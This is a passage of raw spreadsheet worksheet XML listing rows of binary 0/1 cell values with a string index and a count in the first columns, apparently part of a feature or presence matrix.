        <v>0</v>
      </c>
      <c r="RN189">
        <v>0</v>
      </c>
      <c r="RO189">
        <v>0</v>
      </c>
      <c r="RP189">
        <v>0</v>
      </c>
      <c r="RQ189">
        <v>0</v>
      </c>
      <c r="RR189">
        <v>0</v>
      </c>
      <c r="RS189">
        <v>0</v>
      </c>
      <c r="RT189">
        <v>0</v>
      </c>
      <c r="RU189">
        <v>0</v>
      </c>
      <c r="RV189">
        <v>0</v>
      </c>
      <c r="RW189">
        <v>0</v>
      </c>
      <c r="RX189">
        <v>0</v>
      </c>
      <c r="RY189">
        <v>0</v>
      </c>
      <c r="RZ189">
        <v>0</v>
      </c>
      <c r="SA189">
        <v>0</v>
      </c>
    </row>
    <row r="190" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A190" s="6" t="s">
        <v>4752</v>
      </c>
      <c r="B190">
        <v>155</v>
      </c>
      <c r="C190">
        <v>0</v>
      </c>
      <c r="D190">
        <v>1</v>
      </c>
      <c r="E190">
        <v>0</v>
      </c>
      <c r="F190">
        <v>1</v>
      </c>
      <c r="G190">
        <v>0</v>
      </c>
      <c r="H190">
        <v>0</v>
      </c>
      <c r="I190">
        <v>1</v>
      </c>
      <c r="J190">
        <v>0</v>
      </c>
      <c r="K190">
        <v>0</v>
      </c>
      <c r="L190">
        <v>0</v>
      </c>
      <c r="M190">
        <v>1</v>
      </c>
      <c r="N190">
        <v>0</v>
      </c>
      <c r="O190">
        <v>1</v>
      </c>
      <c r="P190">
        <v>0</v>
      </c>
      <c r="Q190">
        <v>0</v>
      </c>
      <c r="R190">
        <v>0</v>
      </c>
      <c r="S190">
        <v>1</v>
      </c>
      <c r="T190">
        <v>1</v>
      </c>
      <c r="U190">
        <v>1</v>
      </c>
      <c r="V190">
        <v>0</v>
      </c>
      <c r="W190">
        <v>0</v>
      </c>
      <c r="X190">
        <v>0</v>
      </c>
      <c r="Y190">
        <v>1</v>
      </c>
      <c r="Z190">
        <v>1</v>
      </c>
      <c r="AA190">
        <v>0</v>
      </c>
      <c r="AB190">
        <v>1</v>
      </c>
      <c r="AC190">
        <v>0</v>
      </c>
      <c r="AD190">
        <v>0</v>
      </c>
      <c r="AE190">
        <v>0</v>
      </c>
      <c r="AF190">
        <v>0</v>
      </c>
      <c r="AG190">
        <v>0</v>
      </c>
      <c r="AH190">
        <v>0</v>
      </c>
      <c r="AI190">
        <v>1</v>
      </c>
      <c r="AJ190">
        <v>0</v>
      </c>
      <c r="AK190">
        <v>1</v>
      </c>
      <c r="AL190">
        <v>0</v>
      </c>
      <c r="AM190">
        <v>0</v>
      </c>
      <c r="AN190">
        <v>1</v>
      </c>
      <c r="AO190">
        <v>1</v>
      </c>
      <c r="AP190">
        <v>0</v>
      </c>
      <c r="AQ190">
        <v>1</v>
      </c>
      <c r="AR190">
        <v>0</v>
      </c>
      <c r="AS190">
        <v>1</v>
      </c>
      <c r="AT190">
        <v>0</v>
      </c>
      <c r="AU190">
        <v>0</v>
      </c>
      <c r="AV190">
        <v>1</v>
      </c>
      <c r="AW190">
        <v>1</v>
      </c>
      <c r="AX190">
        <v>0</v>
      </c>
      <c r="AY190">
        <v>1</v>
      </c>
      <c r="AZ190">
        <v>0</v>
      </c>
      <c r="BA190">
        <v>0</v>
      </c>
      <c r="BB190">
        <v>0</v>
      </c>
      <c r="BC190">
        <v>0</v>
      </c>
      <c r="BD190">
        <v>0</v>
      </c>
      <c r="BE190">
        <v>0</v>
      </c>
      <c r="BF190">
        <v>0</v>
      </c>
      <c r="BG190">
        <v>0</v>
      </c>
      <c r="BH190">
        <v>0</v>
      </c>
      <c r="BI190">
        <v>0</v>
      </c>
      <c r="BJ190">
        <v>0</v>
      </c>
      <c r="BK190">
        <v>0</v>
      </c>
      <c r="BL190">
        <v>1</v>
      </c>
      <c r="BM190">
        <v>1</v>
      </c>
      <c r="BN190">
        <v>1</v>
      </c>
      <c r="BO190">
        <v>1</v>
      </c>
      <c r="BP190">
        <v>1</v>
      </c>
      <c r="BQ190">
        <v>0</v>
      </c>
      <c r="BR190">
        <v>1</v>
      </c>
      <c r="BS190">
        <v>1</v>
      </c>
      <c r="BT190">
        <v>0</v>
      </c>
      <c r="BU190">
        <v>0</v>
      </c>
      <c r="BV190">
        <v>0</v>
      </c>
      <c r="BW190">
        <v>0</v>
      </c>
      <c r="BX190">
        <v>1</v>
      </c>
      <c r="BY190">
        <v>0</v>
      </c>
      <c r="BZ190">
        <v>0</v>
      </c>
      <c r="CA190">
        <v>0</v>
      </c>
      <c r="CB190">
        <v>1</v>
      </c>
      <c r="CC190">
        <v>0</v>
      </c>
      <c r="CD190">
        <v>1</v>
      </c>
      <c r="CE190">
        <v>0</v>
      </c>
      <c r="CF190">
        <v>0</v>
      </c>
      <c r="CG190">
        <v>0</v>
      </c>
      <c r="CH190">
        <v>0</v>
      </c>
      <c r="CI190">
        <v>1</v>
      </c>
      <c r="CJ190">
        <v>0</v>
      </c>
      <c r="CK190">
        <v>0</v>
      </c>
      <c r="CL190">
        <v>0</v>
      </c>
      <c r="CM190">
        <v>0</v>
      </c>
      <c r="CN190">
        <v>0</v>
      </c>
      <c r="CO190">
        <v>1</v>
      </c>
      <c r="CP190">
        <v>1</v>
      </c>
      <c r="CQ190">
        <v>0</v>
      </c>
      <c r="CR190">
        <v>0</v>
      </c>
      <c r="CS190">
        <v>0</v>
      </c>
      <c r="CT190">
        <v>1</v>
      </c>
      <c r="CU190">
        <v>0</v>
      </c>
      <c r="CV190">
        <v>0</v>
      </c>
      <c r="CW190">
        <v>1</v>
      </c>
      <c r="CX190">
        <v>0</v>
      </c>
      <c r="CY190">
        <v>0</v>
      </c>
      <c r="CZ190">
        <v>0</v>
      </c>
      <c r="DA190">
        <v>0</v>
      </c>
      <c r="DB190">
        <v>0</v>
      </c>
      <c r="DC190">
        <v>1</v>
      </c>
      <c r="DD190">
        <v>1</v>
      </c>
      <c r="DE190">
        <v>1</v>
      </c>
      <c r="DF190">
        <v>0</v>
      </c>
      <c r="DG190">
        <v>0</v>
      </c>
      <c r="DH190">
        <v>1</v>
      </c>
      <c r="DI190">
        <v>0</v>
      </c>
      <c r="DJ190">
        <v>0</v>
      </c>
      <c r="DK190">
        <v>0</v>
      </c>
      <c r="DL190">
        <v>1</v>
      </c>
      <c r="DM190">
        <v>0</v>
      </c>
      <c r="DN190">
        <v>1</v>
      </c>
      <c r="DO190">
        <v>1</v>
      </c>
      <c r="DP190">
        <v>1</v>
      </c>
      <c r="DQ190">
        <v>1</v>
      </c>
      <c r="DR190">
        <v>0</v>
      </c>
      <c r="DS190">
        <v>0</v>
      </c>
      <c r="DT190">
        <v>0</v>
      </c>
      <c r="DU190">
        <v>0</v>
      </c>
      <c r="DV190">
        <v>0</v>
      </c>
      <c r="DW190">
        <v>0</v>
      </c>
      <c r="DX190">
        <v>1</v>
      </c>
      <c r="DY190">
        <v>0</v>
      </c>
      <c r="DZ190">
        <v>0</v>
      </c>
      <c r="EA190">
        <v>0</v>
      </c>
      <c r="EB190">
        <v>0</v>
      </c>
      <c r="EC190">
        <v>1</v>
      </c>
      <c r="ED190">
        <v>0</v>
      </c>
      <c r="EE190">
        <v>0</v>
      </c>
      <c r="EF190">
        <v>1</v>
      </c>
      <c r="EG190">
        <v>1</v>
      </c>
      <c r="EH190">
        <v>0</v>
      </c>
      <c r="EI190">
        <v>0</v>
      </c>
      <c r="EJ190">
        <v>0</v>
      </c>
      <c r="EK190">
        <v>0</v>
      </c>
      <c r="EL190">
        <v>1</v>
      </c>
      <c r="EM190">
        <v>1</v>
      </c>
      <c r="EN190">
        <v>1</v>
      </c>
      <c r="EO190">
        <v>0</v>
      </c>
      <c r="EP190">
        <v>0</v>
      </c>
      <c r="EQ190">
        <v>0</v>
      </c>
      <c r="ER190">
        <v>1</v>
      </c>
      <c r="ES190">
        <v>1</v>
      </c>
      <c r="ET190">
        <v>1</v>
      </c>
      <c r="EU190">
        <v>0</v>
      </c>
      <c r="EV190">
        <v>0</v>
      </c>
      <c r="EW190">
        <v>0</v>
      </c>
      <c r="EX190">
        <v>1</v>
      </c>
      <c r="EY190">
        <v>1</v>
      </c>
      <c r="EZ190">
        <v>1</v>
      </c>
      <c r="FA190">
        <v>0</v>
      </c>
      <c r="FB190">
        <v>0</v>
      </c>
      <c r="FC190">
        <v>0</v>
      </c>
      <c r="FD190">
        <v>1</v>
      </c>
      <c r="FE190">
        <v>0</v>
      </c>
      <c r="FF190">
        <v>0</v>
      </c>
      <c r="FG190">
        <v>0</v>
      </c>
      <c r="FH190">
        <v>0</v>
      </c>
      <c r="FI190">
        <v>0</v>
      </c>
      <c r="FJ190">
        <v>0</v>
      </c>
      <c r="FK190">
        <v>0</v>
      </c>
      <c r="FL190">
        <v>0</v>
      </c>
      <c r="FM190">
        <v>0</v>
      </c>
      <c r="FN190">
        <v>0</v>
      </c>
      <c r="FO190">
        <v>0</v>
      </c>
      <c r="FP190">
        <v>0</v>
      </c>
      <c r="FQ190">
        <v>0</v>
      </c>
      <c r="FR190">
        <v>1</v>
      </c>
      <c r="FS190">
        <v>0</v>
      </c>
      <c r="FT190">
        <v>0</v>
      </c>
      <c r="FU190">
        <v>0</v>
      </c>
      <c r="FV190">
        <v>0</v>
      </c>
      <c r="FW190">
        <v>1</v>
      </c>
      <c r="FX190">
        <v>1</v>
      </c>
      <c r="FY190">
        <v>0</v>
      </c>
      <c r="FZ190">
        <v>0</v>
      </c>
      <c r="GA190">
        <v>0</v>
      </c>
      <c r="GB190">
        <v>0</v>
      </c>
      <c r="GC190">
        <v>1</v>
      </c>
      <c r="GD190">
        <v>0</v>
      </c>
      <c r="GE190">
        <v>0</v>
      </c>
      <c r="GF190">
        <v>1</v>
      </c>
      <c r="GG190">
        <v>0</v>
      </c>
      <c r="GH190">
        <v>1</v>
      </c>
      <c r="GI190">
        <v>1</v>
      </c>
      <c r="GJ190">
        <v>0</v>
      </c>
      <c r="GK190">
        <v>1</v>
      </c>
      <c r="GL190">
        <v>1</v>
      </c>
      <c r="GM190">
        <v>0</v>
      </c>
      <c r="GN190">
        <v>1</v>
      </c>
      <c r="GO190">
        <v>0</v>
      </c>
      <c r="GP190">
        <v>1</v>
      </c>
      <c r="GQ190">
        <v>0</v>
      </c>
      <c r="GR190">
        <v>0</v>
      </c>
      <c r="GS190">
        <v>1</v>
      </c>
      <c r="GT190">
        <v>1</v>
      </c>
      <c r="GU190">
        <v>1</v>
      </c>
      <c r="GV190">
        <v>0</v>
      </c>
      <c r="GW190">
        <v>0</v>
      </c>
      <c r="GX190">
        <v>0</v>
      </c>
      <c r="GY190">
        <v>0</v>
      </c>
      <c r="GZ190">
        <v>1</v>
      </c>
      <c r="HA190">
        <v>0</v>
      </c>
      <c r="HB190">
        <v>0</v>
      </c>
      <c r="HC190">
        <v>1</v>
      </c>
      <c r="HD190">
        <v>1</v>
      </c>
      <c r="HE190">
        <v>0</v>
      </c>
      <c r="HF190">
        <v>0</v>
      </c>
      <c r="HG190">
        <v>0</v>
      </c>
      <c r="HH190">
        <v>1</v>
      </c>
      <c r="HI190">
        <v>0</v>
      </c>
      <c r="HJ190">
        <v>0</v>
      </c>
      <c r="HK190">
        <v>0</v>
      </c>
      <c r="HL190">
        <v>0</v>
      </c>
      <c r="HM190">
        <v>1</v>
      </c>
      <c r="HN190">
        <v>1</v>
      </c>
      <c r="HO190">
        <v>0</v>
      </c>
      <c r="HP190">
        <v>1</v>
      </c>
      <c r="HQ190">
        <v>0</v>
      </c>
      <c r="HR190">
        <v>0</v>
      </c>
      <c r="HS190">
        <v>0</v>
      </c>
      <c r="HT190">
        <v>0</v>
      </c>
      <c r="HU190">
        <v>0</v>
      </c>
      <c r="HV190">
        <v>1</v>
      </c>
      <c r="HW190">
        <v>0</v>
      </c>
      <c r="HX190">
        <v>0</v>
      </c>
      <c r="HY190">
        <v>1</v>
      </c>
      <c r="HZ190">
        <v>0</v>
      </c>
      <c r="IA190">
        <v>0</v>
      </c>
      <c r="IB190">
        <v>0</v>
      </c>
      <c r="IC190">
        <v>1</v>
      </c>
      <c r="ID190">
        <v>0</v>
      </c>
      <c r="IE190">
        <v>0</v>
      </c>
      <c r="IF190">
        <v>0</v>
      </c>
      <c r="IG190">
        <v>0</v>
      </c>
      <c r="IH190">
        <v>0</v>
      </c>
      <c r="II190">
        <v>0</v>
      </c>
      <c r="IJ190">
        <v>0</v>
      </c>
      <c r="IK190">
        <v>0</v>
      </c>
      <c r="IL190">
        <v>0</v>
      </c>
      <c r="IM190">
        <v>1</v>
      </c>
      <c r="IN190">
        <v>0</v>
      </c>
      <c r="IO190">
        <v>1</v>
      </c>
      <c r="IP190">
        <v>0</v>
      </c>
      <c r="IQ190">
        <v>1</v>
      </c>
      <c r="IR190">
        <v>0</v>
      </c>
      <c r="IS190">
        <v>0</v>
      </c>
      <c r="IT190">
        <v>1</v>
      </c>
      <c r="IU190">
        <v>1</v>
      </c>
      <c r="IV190">
        <v>0</v>
      </c>
      <c r="IW190">
        <v>0</v>
      </c>
      <c r="IX190">
        <v>0</v>
      </c>
      <c r="IY190">
        <v>0</v>
      </c>
      <c r="IZ190">
        <v>1</v>
      </c>
      <c r="JA190">
        <v>0</v>
      </c>
      <c r="JB190">
        <v>0</v>
      </c>
      <c r="JC190">
        <v>0</v>
      </c>
      <c r="JD190">
        <v>0</v>
      </c>
      <c r="JE190">
        <v>0</v>
      </c>
      <c r="JF190">
        <v>0</v>
      </c>
      <c r="JG190">
        <v>0</v>
      </c>
      <c r="JH190">
        <v>0</v>
      </c>
      <c r="JI190">
        <v>0</v>
      </c>
      <c r="JJ190">
        <v>0</v>
      </c>
      <c r="JK190">
        <v>0</v>
      </c>
      <c r="JL190">
        <v>0</v>
      </c>
      <c r="JM190">
        <v>0</v>
      </c>
      <c r="JN190">
        <v>1</v>
      </c>
      <c r="JO190">
        <v>0</v>
      </c>
      <c r="JP190">
        <v>0</v>
      </c>
      <c r="JQ190">
        <v>0</v>
      </c>
      <c r="JR190">
        <v>0</v>
      </c>
      <c r="JS190">
        <v>0</v>
      </c>
      <c r="JT190">
        <v>1</v>
      </c>
      <c r="JU190">
        <v>0</v>
      </c>
      <c r="JV190">
        <v>0</v>
      </c>
      <c r="JW190">
        <v>0</v>
      </c>
      <c r="JX190">
        <v>0</v>
      </c>
      <c r="JY190">
        <v>0</v>
      </c>
      <c r="JZ190">
        <v>1</v>
      </c>
      <c r="KA190">
        <v>1</v>
      </c>
      <c r="KB190">
        <v>1</v>
      </c>
      <c r="KC190">
        <v>0</v>
      </c>
      <c r="KD190">
        <v>0</v>
      </c>
      <c r="KE190">
        <v>1</v>
      </c>
      <c r="KF190">
        <v>0</v>
      </c>
      <c r="KG190">
        <v>1</v>
      </c>
      <c r="KH190">
        <v>0</v>
      </c>
      <c r="KI190">
        <v>0</v>
      </c>
      <c r="KJ190">
        <v>1</v>
      </c>
      <c r="KK190">
        <v>0</v>
      </c>
      <c r="KL190">
        <v>0</v>
      </c>
      <c r="KM190">
        <v>0</v>
      </c>
      <c r="KN190">
        <v>1</v>
      </c>
      <c r="KO190">
        <v>0</v>
      </c>
      <c r="KP190">
        <v>0</v>
      </c>
      <c r="KQ190">
        <v>1</v>
      </c>
      <c r="KR190">
        <v>0</v>
      </c>
      <c r="KS190">
        <v>1</v>
      </c>
      <c r="KT190">
        <v>1</v>
      </c>
      <c r="KU190">
        <v>0</v>
      </c>
      <c r="KV190">
        <v>0</v>
      </c>
      <c r="KW190">
        <v>0</v>
      </c>
      <c r="KX190">
        <v>0</v>
      </c>
      <c r="KY190">
        <v>0</v>
      </c>
      <c r="KZ190">
        <v>1</v>
      </c>
      <c r="LA190">
        <v>1</v>
      </c>
      <c r="LB190">
        <v>1</v>
      </c>
      <c r="LC190">
        <v>1</v>
      </c>
      <c r="LD190">
        <v>0</v>
      </c>
      <c r="LE190">
        <v>0</v>
      </c>
      <c r="LF190">
        <v>1</v>
      </c>
      <c r="LG190">
        <v>0</v>
      </c>
      <c r="LH190">
        <v>0</v>
      </c>
      <c r="LI190">
        <v>0</v>
      </c>
      <c r="LJ190">
        <v>1</v>
      </c>
      <c r="LK190">
        <v>0</v>
      </c>
      <c r="LL190">
        <v>0</v>
      </c>
      <c r="LM190">
        <v>0</v>
      </c>
      <c r="LN190">
        <v>0</v>
      </c>
      <c r="LO190">
        <v>1</v>
      </c>
      <c r="LP190">
        <v>0</v>
      </c>
      <c r="LQ190">
        <v>0</v>
      </c>
      <c r="LR190">
        <v>0</v>
      </c>
      <c r="LS190">
        <v>0</v>
      </c>
      <c r="LT190">
        <v>0</v>
      </c>
      <c r="LU190">
        <v>0</v>
      </c>
      <c r="LV190">
        <v>1</v>
      </c>
      <c r="LW190">
        <v>1</v>
      </c>
      <c r="LX190">
        <v>0</v>
      </c>
      <c r="LY190">
        <v>0</v>
      </c>
      <c r="LZ190">
        <v>1</v>
      </c>
      <c r="MA190">
        <v>0</v>
      </c>
      <c r="MB190">
        <v>0</v>
      </c>
      <c r="MC190">
        <v>0</v>
      </c>
      <c r="MD190">
        <v>0</v>
      </c>
      <c r="ME190">
        <v>0</v>
      </c>
      <c r="MF190">
        <v>0</v>
      </c>
      <c r="MG190">
        <v>0</v>
      </c>
      <c r="MH190">
        <v>0</v>
      </c>
      <c r="MI190">
        <v>0</v>
      </c>
      <c r="MJ190">
        <v>0</v>
      </c>
      <c r="MK190">
        <v>0</v>
      </c>
      <c r="ML190">
        <v>1</v>
      </c>
      <c r="MM190">
        <v>0</v>
      </c>
      <c r="MN190">
        <v>0</v>
      </c>
      <c r="MO190">
        <v>0</v>
      </c>
      <c r="MP190">
        <v>1</v>
      </c>
      <c r="MQ190">
        <v>0</v>
      </c>
      <c r="MR190">
        <v>1</v>
      </c>
      <c r="MS190">
        <v>0</v>
      </c>
      <c r="MT190">
        <v>0</v>
      </c>
      <c r="MU190">
        <v>0</v>
      </c>
      <c r="MV190">
        <v>1</v>
      </c>
      <c r="MW190">
        <v>0</v>
      </c>
      <c r="MX190">
        <v>0</v>
      </c>
      <c r="MY190">
        <v>0</v>
      </c>
      <c r="MZ190">
        <v>0</v>
      </c>
      <c r="NA190">
        <v>0</v>
      </c>
      <c r="NB190">
        <v>0</v>
      </c>
      <c r="NC190">
        <v>1</v>
      </c>
      <c r="ND190">
        <v>0</v>
      </c>
      <c r="NE190">
        <v>1</v>
      </c>
      <c r="NF190">
        <v>0</v>
      </c>
      <c r="NG190">
        <v>0</v>
      </c>
      <c r="NH190">
        <v>0</v>
      </c>
      <c r="NI190">
        <v>0</v>
      </c>
      <c r="NJ190">
        <v>0</v>
      </c>
      <c r="NK190">
        <v>1</v>
      </c>
      <c r="NL190">
        <v>1</v>
      </c>
      <c r="NM190">
        <v>0</v>
      </c>
      <c r="NN190">
        <v>0</v>
      </c>
      <c r="NO190">
        <v>1</v>
      </c>
      <c r="NP190">
        <v>0</v>
      </c>
      <c r="NQ190">
        <v>0</v>
      </c>
      <c r="NR190">
        <v>0</v>
      </c>
      <c r="NS190">
        <v>1</v>
      </c>
      <c r="NT190">
        <v>0</v>
      </c>
      <c r="NU190">
        <v>1</v>
      </c>
      <c r="NV190">
        <v>0</v>
      </c>
      <c r="NW190">
        <v>0</v>
      </c>
      <c r="NX190">
        <v>0</v>
      </c>
      <c r="NY190">
        <v>1</v>
      </c>
      <c r="NZ190">
        <v>0</v>
      </c>
      <c r="OA190">
        <v>0</v>
      </c>
      <c r="OB190">
        <v>1</v>
      </c>
      <c r="OC190">
        <v>0</v>
      </c>
      <c r="OD190">
        <v>1</v>
      </c>
      <c r="OE190">
        <v>1</v>
      </c>
      <c r="OF190">
        <v>0</v>
      </c>
      <c r="OG190">
        <v>0</v>
      </c>
      <c r="OH190">
        <v>0</v>
      </c>
      <c r="OI190">
        <v>0</v>
      </c>
      <c r="OJ190">
        <v>0</v>
      </c>
      <c r="OK190">
        <v>1</v>
      </c>
      <c r="OL190">
        <v>1</v>
      </c>
      <c r="OM190">
        <v>1</v>
      </c>
      <c r="ON190">
        <v>1</v>
      </c>
      <c r="OO190">
        <v>0</v>
      </c>
      <c r="OP190">
        <v>0</v>
      </c>
      <c r="OQ190">
        <v>0</v>
      </c>
      <c r="OR190">
        <v>1</v>
      </c>
      <c r="OS190">
        <v>0</v>
      </c>
      <c r="OT190">
        <v>0</v>
      </c>
      <c r="OU190">
        <v>0</v>
      </c>
      <c r="OV190">
        <v>0</v>
      </c>
      <c r="OW190">
        <v>1</v>
      </c>
      <c r="OX190">
        <v>0</v>
      </c>
      <c r="OY190">
        <v>0</v>
      </c>
      <c r="OZ190">
        <v>0</v>
      </c>
      <c r="PA190">
        <v>1</v>
      </c>
      <c r="PB190">
        <v>1</v>
      </c>
      <c r="PC190">
        <v>1</v>
      </c>
      <c r="PD190">
        <v>0</v>
      </c>
      <c r="PE190">
        <v>0</v>
      </c>
      <c r="PF190">
        <v>1</v>
      </c>
      <c r="PG190">
        <v>1</v>
      </c>
      <c r="PH190">
        <v>0</v>
      </c>
      <c r="PI190">
        <v>0</v>
      </c>
      <c r="PJ190">
        <v>0</v>
      </c>
      <c r="PK190">
        <v>1</v>
      </c>
      <c r="PL190">
        <v>0</v>
      </c>
      <c r="PM190">
        <v>0</v>
      </c>
      <c r="PN190">
        <v>1</v>
      </c>
      <c r="PO190">
        <v>0</v>
      </c>
      <c r="PP190">
        <v>0</v>
      </c>
      <c r="PQ190">
        <v>0</v>
      </c>
      <c r="PR190">
        <v>1</v>
      </c>
      <c r="PS190">
        <v>0</v>
      </c>
      <c r="PT190">
        <v>1</v>
      </c>
      <c r="PU190">
        <v>1</v>
      </c>
      <c r="PV190">
        <v>0</v>
      </c>
      <c r="PW190">
        <v>1</v>
      </c>
      <c r="PX190">
        <v>0</v>
      </c>
      <c r="PY190">
        <v>0</v>
      </c>
      <c r="PZ190">
        <v>1</v>
      </c>
      <c r="QA190">
        <v>0</v>
      </c>
      <c r="QB190">
        <v>1</v>
      </c>
      <c r="QC190">
        <v>0</v>
      </c>
      <c r="QD190">
        <v>0</v>
      </c>
      <c r="QE190">
        <v>0</v>
      </c>
      <c r="QF190">
        <v>1</v>
      </c>
      <c r="QG190">
        <v>0</v>
      </c>
      <c r="QH190">
        <v>0</v>
      </c>
      <c r="QI190">
        <v>0</v>
      </c>
      <c r="QJ190">
        <v>0</v>
      </c>
      <c r="QK190">
        <v>0</v>
      </c>
      <c r="QL190">
        <v>0</v>
      </c>
      <c r="QM190">
        <v>0</v>
      </c>
      <c r="QN190">
        <v>1</v>
      </c>
      <c r="QO190">
        <v>0</v>
      </c>
      <c r="QP190">
        <v>0</v>
      </c>
      <c r="QQ190">
        <v>0</v>
      </c>
      <c r="QR190">
        <v>0</v>
      </c>
      <c r="QS190">
        <v>1</v>
      </c>
      <c r="QT190">
        <v>0</v>
      </c>
      <c r="QU190">
        <v>0</v>
      </c>
      <c r="QV190">
        <v>1</v>
      </c>
      <c r="QW190">
        <v>1</v>
      </c>
      <c r="QX190">
        <v>0</v>
      </c>
      <c r="QY190">
        <v>0</v>
      </c>
      <c r="QZ190">
        <v>0</v>
      </c>
      <c r="RA190">
        <v>0</v>
      </c>
      <c r="RB190">
        <v>0</v>
      </c>
      <c r="RC190">
        <v>1</v>
      </c>
      <c r="RD190">
        <v>0</v>
      </c>
      <c r="RE190">
        <v>0</v>
      </c>
      <c r="RF190">
        <v>1</v>
      </c>
      <c r="RG190">
        <v>0</v>
      </c>
      <c r="RH190">
        <v>0</v>
      </c>
      <c r="RI190">
        <v>0</v>
      </c>
      <c r="RJ190">
        <v>1</v>
      </c>
      <c r="RK190">
        <v>0</v>
      </c>
      <c r="RL190">
        <v>0</v>
      </c>
      <c r="RM190">
        <v>1</v>
      </c>
      <c r="RN190">
        <v>0</v>
      </c>
      <c r="RO190">
        <v>0</v>
      </c>
      <c r="RP190">
        <v>0</v>
      </c>
      <c r="RQ190">
        <v>0</v>
      </c>
      <c r="RR190">
        <v>1</v>
      </c>
      <c r="RS190">
        <v>0</v>
      </c>
      <c r="RT190">
        <v>0</v>
      </c>
      <c r="RU190">
        <v>0</v>
      </c>
      <c r="RV190">
        <v>0</v>
      </c>
      <c r="RW190">
        <v>0</v>
      </c>
      <c r="RX190">
        <v>0</v>
      </c>
      <c r="RY190">
        <v>0</v>
      </c>
      <c r="RZ190">
        <v>1</v>
      </c>
      <c r="SA190">
        <v>0</v>
      </c>
    </row>
    <row r="191" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A191" s="6" t="s">
        <v>4757</v>
      </c>
      <c r="B191">
        <v>37</v>
      </c>
      <c r="C191">
        <v>0</v>
      </c>
      <c r="D191">
        <v>0</v>
      </c>
      <c r="E191">
        <v>1</v>
      </c>
      <c r="F191">
        <v>0</v>
      </c>
      <c r="G191">
        <v>0</v>
      </c>
      <c r="H191">
        <v>0</v>
      </c>
      <c r="I191">
        <v>1</v>
      </c>
      <c r="J191">
        <v>0</v>
      </c>
      <c r="K191">
        <v>0</v>
      </c>
      <c r="L191">
        <v>0</v>
      </c>
      <c r="M191">
        <v>0</v>
      </c>
      <c r="N191">
        <v>0</v>
      </c>
      <c r="O191">
        <v>0</v>
      </c>
      <c r="P191">
        <v>1</v>
      </c>
      <c r="Q191">
        <v>1</v>
      </c>
      <c r="R191">
        <v>0</v>
      </c>
      <c r="S191">
        <v>1</v>
      </c>
      <c r="T191">
        <v>0</v>
      </c>
      <c r="U191">
        <v>0</v>
      </c>
      <c r="V191">
        <v>0</v>
      </c>
      <c r="W191">
        <v>0</v>
      </c>
      <c r="X191">
        <v>1</v>
      </c>
      <c r="Y191">
        <v>0</v>
      </c>
      <c r="Z191">
        <v>0</v>
      </c>
      <c r="AA191">
        <v>0</v>
      </c>
      <c r="AB191">
        <v>0</v>
      </c>
      <c r="AC191">
        <v>0</v>
      </c>
      <c r="AD191">
        <v>0</v>
      </c>
      <c r="AE191">
        <v>0</v>
      </c>
      <c r="AF191">
        <v>0</v>
      </c>
      <c r="AG191">
        <v>0</v>
      </c>
      <c r="AH191">
        <v>0</v>
      </c>
      <c r="AI191">
        <v>0</v>
      </c>
      <c r="AJ191">
        <v>0</v>
      </c>
      <c r="AK191">
        <v>1</v>
      </c>
      <c r="AL191">
        <v>0</v>
      </c>
      <c r="AM191">
        <v>0</v>
      </c>
      <c r="AN191">
        <v>0</v>
      </c>
      <c r="AO191">
        <v>1</v>
      </c>
      <c r="AP191">
        <v>0</v>
      </c>
      <c r="AQ191">
        <v>0</v>
      </c>
      <c r="AR191">
        <v>0</v>
      </c>
      <c r="AS191">
        <v>0</v>
      </c>
      <c r="AT191">
        <v>0</v>
      </c>
      <c r="AU191">
        <v>0</v>
      </c>
      <c r="AV191">
        <v>0</v>
      </c>
      <c r="AW191">
        <v>0</v>
      </c>
      <c r="AX191">
        <v>0</v>
      </c>
      <c r="AY191">
        <v>0</v>
      </c>
      <c r="AZ191">
        <v>0</v>
      </c>
      <c r="BA191">
        <v>0</v>
      </c>
      <c r="BB191">
        <v>0</v>
      </c>
      <c r="BC191">
        <v>0</v>
      </c>
      <c r="BD191">
        <v>0</v>
      </c>
      <c r="BE191">
        <v>0</v>
      </c>
      <c r="BF191">
        <v>0</v>
      </c>
      <c r="BG191">
        <v>0</v>
      </c>
      <c r="BH191">
        <v>0</v>
      </c>
      <c r="BI191">
        <v>0</v>
      </c>
      <c r="BJ191">
        <v>0</v>
      </c>
      <c r="BK191">
        <v>0</v>
      </c>
      <c r="BL191">
        <v>0</v>
      </c>
      <c r="BM191">
        <v>0</v>
      </c>
      <c r="BN191">
        <v>0</v>
      </c>
      <c r="BO191">
        <v>0</v>
      </c>
      <c r="BP191">
        <v>1</v>
      </c>
      <c r="BQ191">
        <v>0</v>
      </c>
      <c r="BR191">
        <v>0</v>
      </c>
      <c r="BS191">
        <v>0</v>
      </c>
      <c r="BT191">
        <v>0</v>
      </c>
      <c r="BU191">
        <v>0</v>
      </c>
      <c r="BV191">
        <v>0</v>
      </c>
      <c r="BW191">
        <v>0</v>
      </c>
      <c r="BX191">
        <v>1</v>
      </c>
      <c r="BY191">
        <v>0</v>
      </c>
      <c r="BZ191">
        <v>0</v>
      </c>
      <c r="CA191">
        <v>0</v>
      </c>
      <c r="CB191">
        <v>0</v>
      </c>
      <c r="CC191">
        <v>0</v>
      </c>
      <c r="CD191">
        <v>0</v>
      </c>
      <c r="CE191">
        <v>0</v>
      </c>
      <c r="CF191">
        <v>0</v>
      </c>
      <c r="CG191">
        <v>0</v>
      </c>
      <c r="CH191">
        <v>0</v>
      </c>
      <c r="CI191">
        <v>0</v>
      </c>
      <c r="CJ191">
        <v>0</v>
      </c>
      <c r="CK191">
        <v>0</v>
      </c>
      <c r="CL191">
        <v>0</v>
      </c>
      <c r="CM191">
        <v>0</v>
      </c>
      <c r="CN191">
        <v>0</v>
      </c>
      <c r="CO191">
        <v>0</v>
      </c>
      <c r="CP191">
        <v>0</v>
      </c>
      <c r="CQ191">
        <v>0</v>
      </c>
      <c r="CR191">
        <v>0</v>
      </c>
      <c r="CS191">
        <v>0</v>
      </c>
      <c r="CT191">
        <v>0</v>
      </c>
      <c r="CU191">
        <v>0</v>
      </c>
      <c r="CV191">
        <v>0</v>
      </c>
      <c r="CW191">
        <v>0</v>
      </c>
      <c r="CX191">
        <v>0</v>
      </c>
      <c r="CY191">
        <v>0</v>
      </c>
      <c r="CZ191">
        <v>0</v>
      </c>
      <c r="DA191">
        <v>0</v>
      </c>
      <c r="DB191">
        <v>0</v>
      </c>
      <c r="DC191">
        <v>0</v>
      </c>
      <c r="DD191">
        <v>0</v>
      </c>
      <c r="DE191">
        <v>0</v>
      </c>
      <c r="DF191">
        <v>1</v>
      </c>
      <c r="DG191">
        <v>0</v>
      </c>
